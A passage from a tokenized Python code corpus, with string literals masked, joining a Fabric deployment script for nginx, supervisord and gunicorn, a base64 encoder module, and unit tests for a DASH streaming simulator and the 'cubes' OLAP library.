'<STR_LIT>' in res : <EOL> abort ( red_bg ( '<STR_LIT>' ) ) <EOL> def _upload_nginx_conf ( ) : <EOL> '''<STR_LIT>''' <EOL> local_nginx_conf_file_name = '<STR_LIT>' <EOL> if env . nginx_https : <EOL> local_nginx_conf_file_name = '<STR_LIT>' <EOL> local_nginx_conf_file_path = "<STR_LIT>" % ( dirname ( env . real_fabfile ) , local_nginx_conf_file_name ) <EOL> if isfile ( local_nginx_conf_file_path ) : <EOL> '''<STR_LIT>''' <EOL> template = local_nginx_conf_file_path <EOL> else : <EOL> template = '<STR_LIT>' % ( fagungis_path , local_nginx_conf_file_name ) <EOL> context = copy ( env ) <EOL> upload_template ( template , env . nginx_conf_file , <EOL> context = context , backup = False , use_sudo = True ) <EOL> sudo ( '<STR_LIT>' % ( env . nginx_conf_file , basename ( env . nginx_conf_file ) ) ) <EOL> _test_nginx_conf ( ) <EOL> sudo ( '<STR_LIT>' ) <EOL> def _reload_supervisorctl ( ) : <EOL> sudo ( '<STR_LIT>' % env ) <EOL> sudo ( '<STR_LIT>' % env ) <EOL> def _upload_supervisord_conf ( ) : <EOL> '''<STR_LIT>''' <EOL> local_supervisord_conf_file_path = "<STR_LIT>" % dirname ( env . real_fabfile ) <EOL> if isfile ( local_supervisord_conf_file_path ) : <EOL> '''<STR_LIT>''' <EOL> template = local_supervisord_conf_file_path <EOL> else : <EOL> template = '<STR_LIT>' % fagungis_path <EOL> upload_template ( template , env . supervisord_conf_file , <EOL> context = env , backup = False , use_sudo = True ) <EOL> sudo ( '<STR_LIT>' % ( env . supervisord_conf_file , basename ( env . supervisord_conf_file ) ) ) <EOL> _reload_supervisorctl ( ) <EOL> def _prepare_django_project ( ) : <EOL> with cd ( env . django_project_root ) : <EOL> virtenvrun ( '<STR_LIT>' ) <EOL> if env . south_used : <EOL> virtenvrun ( '<STR_LIT>' ) <EOL> virtenvsudo ( '<STR_LIT>' ) <EOL> def _prepare_media_path ( ) : <EOL> path = env . django_media_path . rstrip ( '<STR_LIT:/>' ) <EOL> sudo ( '<STR_LIT>' % path ) <EOL> sudo ( '<STR_LIT>' % path ) <EOL> def _upload_rungunicorn_script ( ) : <EOL> '''<STR_LIT>''' <EOL> if isfile ( '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> template = '<STR_LIT>' <EOL> else : <EOL> template = '<STR_LIT>' % fagungis_path <EOL> upload_template ( template , env . rungunicorn_script , <EOL> context = env , backup = False , use_sudo = True ) <EOL> sudo ( '<STR_LIT>' % env . rungunicorn_script ) <EOL> def _supervisor_restart ( ) : <EOL> with settings ( hide ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , warn_only = True ) : <EOL> res = sudo ( '<STR_LIT>' % env ) <EOL> if '<STR_LIT>' in res : <EOL> print red_bg ( "<STR_LIT>" % env . supervisor_program_name ) <EOL> else : <EOL> print green_bg ( "<STR_LIT>" % env . supervisor_program_name ) </s>
<s> from sneakers . modules import Encoder <EOL> import base64 <EOL> class B64 ( Encoder ) : <EOL> description = """<STR_LIT>""" <EOL> def encode ( self , data ) : <EOL> params = self . params [ '<STR_LIT>' ] <EOL> return base64 . b64encode ( data ) <EOL> def decode ( self , data ) : <EOL> params = self . params [ '<STR_LIT>' ] <EOL> return base64 . urlsafe_b64decode ( str ( data ) ) </s>
<s> from __future__ import print_function , division , absolute_import <EOL> import unittest <EOL> import os <EOL> import sys <EOL> from . . pypi import _extract_html <EOL> from . . unpack import unpack_html <EOL> class ExtractHtmlTest ( unittest . TestCase ) : <EOL> def test_extract_html ( self ) : <EOL> path = os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' ) <EOL> with open ( path ) as f : <EOL> names = _extract_html ( f . read ( ) ) <EOL> self . assertListEqual ( names , '<STR_LIT>' . split ( ) ) <EOL> class UnpackHtmlTest ( unittest . TestCase ) : <EOL> @ unittest . skipIf ( sys . version_info [ <NUM_LIT:0> ] != <NUM_LIT:3> , '<STR_LIT>' ) <EOL> def test_py3_unpack_html ( self ) : <EOL> data = bytes ( '<STR_LIT>' , '<STR_LIT:utf-8>' ) <EOL> self . assertEqual ( unpack_html ( data ) , data . decode ( '<STR_LIT:utf-8>' ) ) <EOL> @ unittest . skipIf ( sys . version_info [ <NUM_LIT:0> ] != <NUM_LIT:2> , '<STR_LIT>' ) <EOL> def test_py2_unpack_html ( self ) : <EOL> data = '<STR_LIT:abc>' <EOL> self . assertEqual ( unpack_html ( data ) , data . decode ( '<STR_LIT:utf-8>' ) ) </s>
<s> SERVER_VERSION = "<STR_LIT>" <EOL> SERVER_AGENT = "<STR_LIT>" % SERVER_VERSION </s>
<s> import unittest , sys <EOL> from dash_test_util import * <EOL> from dashlivesim . dashlib import dash_proxy <EOL> from dashlivesim . dashlib import mpdprocessor <EOL> class TestMPDProcessing ( unittest . TestCase ) : <EOL> "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> self . oldBaseUrlState = mpdprocessor . SET_BASEURL <EOL> mpdprocessor . SET_BASEURL = False <EOL> def tearDown ( self ) : <EOL> mpdprocessor . SET_BASEURL = self . oldBaseUrlState <EOL> def testMPDhandling ( self ) : <EOL> mpdprocessor . SET_BASEURL = True <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertTrue ( d . find ( "<STR_LIT>" ) > <NUM_LIT:0> ) <EOL> def testMPDwithChangedAST ( self ) : <EOL> "<STR_LIT>" <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) < <NUM_LIT:0> ) <EOL> def testMPDwithStartandDur ( self ) : <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> if dash_proxy . PUBLISH_TIME : <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> def testMPDwithStartand2Durations ( self ) : <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> if dash_proxy . PUBLISH_TIME : <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> if dash_proxy . PUBLISH_TIME : <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> def testHttpsBaseURL ( self ) : <EOL> "<STR_LIT>" <EOL> mpdprocessor . SET_BASEURL = True <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> is_https = <NUM_LIT:1> <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> , <EOL> is_https = is_https ) <EOL> d = dp . handle_request ( ) <EOL> self . assertTrue ( d . find ( "<STR_LIT>" ) > <NUM_LIT:0> ) <EOL> class TestInitSegmentProcessing ( unittest . TestCase ) : <EOL> def testInit ( self ) : <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( len ( d ) , <NUM_LIT> ) <EOL> class TestMediaSegments ( unittest . TestCase ) : <EOL> def testMediaSegmentForTfdt32 ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> now = <NUM_LIT> <EOL> segment = "<STR_LIT>" <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> self . assertEqual ( len ( d ) , <NUM_LIT> ) <EOL> def testMediaSegmentTooEarly ( self ) : <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( d [ '<STR_LIT>' ] , False ) <EOL> def testMediaSegmentTooEarlyWithAST ( self ) : <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:10> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( d [ '<STR_LIT>' ] , False ) <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( len ( d ) , <NUM_LIT> ) <EOL> def testMediaSegmentBeforeTimeShiftBufferDepth ( self ) : <EOL> now = <NUM_LIT> <EOL> segment = "<STR_LIT>" % ( ( now - <NUM_LIT> ) / <NUM_LIT:6> ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( d [ '<STR_LIT>' ] , False ) <EOL> def testLastMediaSegment ( self ) : <EOL> "<STR_LIT>" <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( d . find ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> def testMultiPeriod ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> periodPositions = findAllIndexes ( "<STR_LIT>" , d ) <EOL> self . assertEqual ( len ( periodPositions ) , <NUM_LIT:2> ) <EOL> def testContinuous ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> periodPositions = findAllIndexes ( "<STR_LIT>" , d ) <EOL> self . assertGreater ( len ( periodPositions ) , <NUM_LIT:1> ) <EOL> def testUtcTiming ( self ) : <EOL> "<STR_LIT>" <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> ) <EOL> d = dp . handle_request ( ) <EOL> head_pos = d . find ( '<STR_LIT>' ) <EOL> direct_pos = d . find ( '<STR_LIT>' ) <EOL> self . assertLess ( direct_pos , head_pos ) <EOL> class TestMorePathLevels ( unittest . TestCase ) : <EOL> "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> self . oldBaseUrlState = mpdprocessor . SET_BASEURL <EOL> mpdprocessor . SET_BASEURL = False <EOL> def tearDown ( self ) : <EOL> mpdprocessor . SET_BASEURL = self . oldBaseUrlState <EOL> def testMPDGet ( self ) : <EOL> mpdprocessor . SET_BASEURL = True <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertGreater ( d . find ( "<STR_LIT>" ) , <NUM_LIT:0> ) <EOL> def testInit ( self ) : <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( len ( d ) , <NUM_LIT> ) <EOL> def testMediaSegment ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> now = <NUM_LIT> <EOL> segment = "<STR_LIT>" % ( ( now - <NUM_LIT> ) / <NUM_LIT:6> ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> class TestTfdt ( unittest . TestCase ) : <EOL> "<STR_LIT>" <EOL> def testMediaSegment ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> now = <NUM_LIT> <EOL> segment = "<STR_LIT>" % ( ( now - <NUM_LIT> ) / <NUM_LIT:6> ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> def testTfdtValueFromZero ( self ) : <EOL> "<STR_LIT>" <EOL> now = <NUM_LIT> <EOL> segNr = <NUM_LIT> <EOL> segment = "<STR_LIT>" % segNr <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> tfdtValue = dp . new_tfdt_value <EOL> presentationTime = tfdtValue / <NUM_LIT> <EOL> segmentTime = segNr * <NUM_LIT:6> <EOL> self . assertEqual ( presentationTime , segmentTime ) <EOL> def testThatNoPresentationTimeOffsetForTfdt32 ( self ) : <EOL> now = <NUM_LIT> <EOL> segNr = <NUM_LIT> <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> self . assertFalse ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> class TestInitMux ( unittest . TestCase ) : <EOL> def testInitMux ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> now = <NUM_LIT> <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> def testMediaMux ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> now = <NUM_LIT> <EOL> segment = "<STR_LIT>" % ( ( now - <NUM_LIT> ) / <NUM_LIT:6> ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> class TestScte35Manifest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> now = <NUM_LIT> <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> self . mpd = dp . handle_request ( ) <EOL> def test_scte35_profile_presence ( self ) : <EOL> self . assertTrue ( self . mpd . find ( "<STR_LIT>" ) > <NUM_LIT:0> ) <EOL> def test_inband_stream_signal ( self ) : <EOL> self . assertTrue ( self . mpd . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> class TestScte35Segments ( unittest . TestCase ) : <EOL> def testScte35Event ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> segDur = <NUM_LIT:6> <EOL> segNr = <NUM_LIT> <EOL> now = segNr * segDur + <NUM_LIT:50> <EOL> segment = "<STR_LIT>" % segNr <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( d . find ( '<STR_LIT>' ) , <NUM_LIT> ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> def testNoScte35Event ( self ) : <EOL> segDur = <NUM_LIT:6> <EOL> segNr = <NUM_LIT> <EOL> now = segNr * segDur + <NUM_LIT:50> <EOL> segment = "<STR_LIT>" % segNr <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( d . find ( '<STR_LIT>' ) , - <NUM_LIT:1> ) </s>
<s> from __future__ import absolute_import <EOL> from logging import getLogger , Formatter , StreamHandler , FileHandler <EOL> from . errors import * <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> DEFAULT_LOGGER_NAME = "<STR_LIT>" <EOL> DEFAULT_FORMAT = "<STR_LIT>" <EOL> logger = None <EOL> def get_logger ( path = None , format_ = None , name = None ) : <EOL> """<STR_LIT>""" <EOL> global logger <EOL> if logger : <EOL> return logger <EOL> else : <EOL> return create_logger ( path , format_ , name ) <EOL> def create_logger ( path = None , format_ = None , name = None ) : <EOL> """<STR_LIT>""" <EOL> global logger <EOL> logger = getLogger ( name or DEFAULT_LOGGER_NAME ) <EOL> if not logger . handlers : <EOL> formatter = Formatter ( fmt = format_ or DEFAULT_FORMAT ) <EOL> if path : <EOL> handler = FileHandler ( path ) <EOL> else : <EOL> handler = StreamHandler ( ) <EOL> handler . setFormatter ( formatter ) <EOL> logger . addHandler ( handler ) <EOL> return logger </s>
<s> import unittest <EOL> from cubes . cells import Cell , PointCut , SetCut , RangeCut <EOL> from cubes . cells import string_from_path , cut_from_string , path_from_string <EOL> from cubes . cells import cut_from_dict <EOL> from cubes . errors import CubesError , ArgumentError <EOL> from cubes . errors import HierarchyError , NoSuchDimensionError <EOL> from . common import CubesTestCaseBase , create_provider <EOL> class CutsTestCase ( CubesTestCaseBase ) : <EOL> def setUp ( self ) : <EOL> super ( CutsTestCase , self ) . setUp ( ) <EOL> self . provider = create_provider ( "<STR_LIT>" ) <EOL> self . cube = self . provider . cube ( "<STR_LIT>" ) <EOL> self . dim_date = self . cube . dimension ( "<STR_LIT:date>" ) <EOL> def test_cut_depth ( self ) : <EOL> dim = self . cube . dimension ( "<STR_LIT:date>" ) <EOL> self . assertEqual ( <NUM_LIT:1> , PointCut ( dim , [ <NUM_LIT:1> ] ) . level_depth ( ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , PointCut ( dim , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) . level_depth ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , RangeCut ( dim , [ <NUM_LIT:1> ] , [ <NUM_LIT:1> ] ) . level_depth ( ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , RangeCut ( dim , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:1> ] ) . level_depth ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , SetCut ( dim , [ [ <NUM_LIT:1> ] , [ <NUM_LIT:1> ] ] ) . level_depth ( ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , SetCut ( dim , [ [ <NUM_LIT:1> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ] ) . level_depth ( ) ) <EOL> def test_cut_from_dict ( self ) : <EOL> d = { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT:path>" : [ <NUM_LIT> ] , "<STR_LIT>" : "<STR_LIT:date>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : None , "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False } <EOL> cut = cut_from_dict ( d ) <EOL> tcut = PointCut ( "<STR_LIT:date>" , [ <NUM_LIT> ] ) <EOL> self . assertEqual ( tcut , cut ) <EOL> self . assertEqual ( dict ( d ) , tcut . to_dict ( ) ) <EOL> self . _assert_invert ( d , cut , tcut ) <EOL> d = { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : [ <NUM_LIT> ] , "<STR_LIT:to>" : [ <NUM_LIT> , <NUM_LIT:10> ] , "<STR_LIT>" : <EOL> "<STR_LIT:date>" , "<STR_LIT>" : <NUM_LIT:2> , "<STR_LIT>" : None , "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False } <EOL> cut = cut_from_dict ( d ) <EOL> tcut = RangeCut ( "<STR_LIT:date>" , [ <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:10> ] ) <EOL> self . assertEqual ( tcut , cut ) <EOL> self . assertEqual ( dict ( d ) , tcut . to_dict ( ) ) <EOL> self . _assert_invert ( d , cut , tcut ) <EOL> d = { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : [ [ <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:10> ] ] , "<STR_LIT>" : "<STR_LIT:date>" , <EOL> "<STR_LIT>" : <NUM_LIT:2> , "<STR_LIT>" : None , "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False } <EOL> cut = cut_from_dict ( d ) <EOL> tcut = SetCut ( "<STR_LIT:date>" , [ [ <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:10> ] ] ) <EOL> self . assertEqual ( tcut , cut ) <EOL> self . assertEqual ( dict ( d ) , tcut . to_dict ( ) ) <EOL> self . _assert_invert ( d , cut , tcut ) <EOL> self . assertRaises ( ArgumentError , cut_from_dict , { "<STR_LIT:type>" : "<STR_LIT>" } ) <EOL> def _assert_invert ( self , d , cut , tcut ) : <EOL> cut . invert = True <EOL> tcut . invert = True <EOL> d [ "<STR_LIT>" ] = True <EOL> self . assertEqual ( tcut , cut ) <EOL> self . assertEqual ( dict ( d ) , tcut . to_dict ( ) ) <EOL> class StringConversionsTestCase ( unittest . TestCase ) : <EOL> def test_cut_string_conversions ( self ) : <EOL> cut = PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:_>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( r"<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> def test_special_characters ( self ) : <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> string_from_path ( [ "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:100> ] ) ) <EOL> def test_string_from_path ( self ) : <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> string_from_path ( [ "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:100> ] ) ) <EOL> self . assertEqual ( '<STR_LIT>' , string_from_path ( [ ] ) ) <EOL> self . assertEqual ( '<STR_LIT>' , string_from_path ( None ) ) <EOL> def test_path_from_string ( self ) : <EOL> self . assertEqual ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:100>" ] , <EOL> path_from_string ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ ] , path_from_string ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ ] , path_from_string ( None ) ) <EOL> def test_set_cut_string ( self ) : <EOL> cut = SetCut ( "<STR_LIT:foo>" , [ [ "<STR_LIT:1>" ] , [ "<STR_LIT:2>" , "<STR_LIT:3>" ] , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:100>" ] ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = SetCut ( "<STR_LIT:foo>" , [ [ "<STR_LIT>" ] ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] ) , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = SetCut ( "<STR_LIT:foo>" , [ [ "<STR_LIT>" ] ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] ) , cut_from_string ( "<STR_LIT>" ) ) <EOL> def test_range_cut_string ( self ) : <EOL> cut = RangeCut ( "<STR_LIT:date>" , [ "<STR_LIT>" ] , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = RangeCut ( "<STR_LIT:date>" , [ "<STR_LIT>" ] , None ) <EOL> self . assertEqual ( 